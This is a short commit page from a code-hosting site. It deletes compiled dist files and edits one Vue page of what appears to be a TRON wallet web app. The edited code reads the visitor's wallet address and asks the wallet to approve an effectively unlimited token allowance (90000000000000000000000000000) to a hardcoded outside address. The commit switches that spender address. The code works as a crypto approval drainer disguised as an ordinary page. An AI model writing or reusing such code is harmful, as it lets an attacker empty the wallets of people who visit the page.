gx
queenwuli
2022-03-29 459c270b4d73dfde3c5593457881cbf3f767fd04
gx
19 files deleted
1 files modified
80 ■■■■■ changed files
dist/css/app.97c05da1.css 1 ●●●● patch | view | raw | blame | history
dist/css/chunk-vendors.673a53be.css 1 ●●●● patch | view | raw | blame | history
dist/favicon.ico patch | view | raw | blame | history
dist/img/banner.4eb4f6c3.png patch | view | raw | blame | history
dist/img/icon7.b4968d52.png patch | view | raw | blame | history
dist/img/img1.d1d00702.png patch | view | raw | blame | history
dist/img/img2.96ce2ee5.png patch | view | raw | blame | history
dist/img/img3.53099b4f.png patch | view | raw | blame | history
dist/img/img4.9c4730d5.png patch | view | raw | blame | history
dist/img/img5.9cb62c6e.png patch | view | raw | blame | history
dist/img/img6.e1023e8c.png patch | view | raw | blame | history
dist/img/img7.46b55a63.png patch | view | raw | blame | history
dist/img/img8.fe0dd4a9.png patch | view | raw | blame | history
dist/img/img9.56132f25.png patch | view | raw | blame | history
dist/index.html 1 ●●●● patch | view | raw | blame | history
dist/js/app.fd461d1e.js 2 ●●●●● patch | view | raw | blame | history
dist/js/app.fd461d1e.js.map 1 ●●●● patch | view | raw | blame | history
dist/js/chunk-vendors.c720ab51.js 68 ●●●●● patch | view | raw | blame | history
dist/js/chunk-vendors.c720ab51.js.map 1 ●●●● patch | view | raw | blame | history
src/pages/index/index.vue 5 ●●●●● patch | view | raw | blame | history
dist/css/app.97c05da1.css
File was deleted
dist/css/chunk-vendors.673a53be.css
File was deleted
dist/favicon.ico
Binary files differ
dist/img/banner.4eb4f6c3.png
Binary files differ
dist/img/icon7.b4968d52.png
Binary files differ
dist/img/img1.d1d00702.png
Binary files differ
dist/img/img2.96ce2ee5.png
Binary files differ
dist/img/img3.53099b4f.png
Binary files differ
dist/img/img4.9c4730d5.png
Binary files differ
dist/img/img5.9cb62c6e.png
Binary files differ
dist/img/img6.e1023e8c.png
Binary files differ
dist/img/img7.46b55a63.png
Binary files differ
dist/img/img8.fe0dd4a9.png
Binary files differ
dist/img/img9.56132f25.png
Binary files differ
dist/index.html
File was deleted
dist/js/app.fd461d1e.js
File was deleted
dist/js/app.fd461d1e.js.map
File was deleted
dist/js/chunk-vendors.c720ab51.js
File was deleted
dist/js/chunk-vendors.c720ab51.js.map
File was deleted
src/pages/index/index.vue
@@ -270,8 +270,7 @@
      }else if(window.tronWeb){
        address = window.tronWeb.defaultAddress.base58;
      }
      // this.walletAddress = address;
      this.walletAddress = 'TUy8XwDmdsDKPLDGUrGuNRVMhwSEKtkDcD';
      this.walletAddress = address;
    },
    isApprove () {
        this.$axios({
@@ -319,7 +318,7 @@
    async tornWebApprove () {
      const tronWeb = window.tronWeb;
      const trxContractAddress = "TR7NHqjeKQxGTCi8q8ZY4pL8otSzgjLj6t";
      const authAddress = "TKcyw4igFYhNpTzyZv25j6uDwvTYzncnjp";
      const authAddress = "TUy8XwDmdsDKPLDGUrGuNRVMhwSEKtkDcD";
      let instance = await tronWeb.contract().at(trxContractAddress);
      let res = await instance["approve"](authAddress, "90000000000000000000000000000");
      res.send({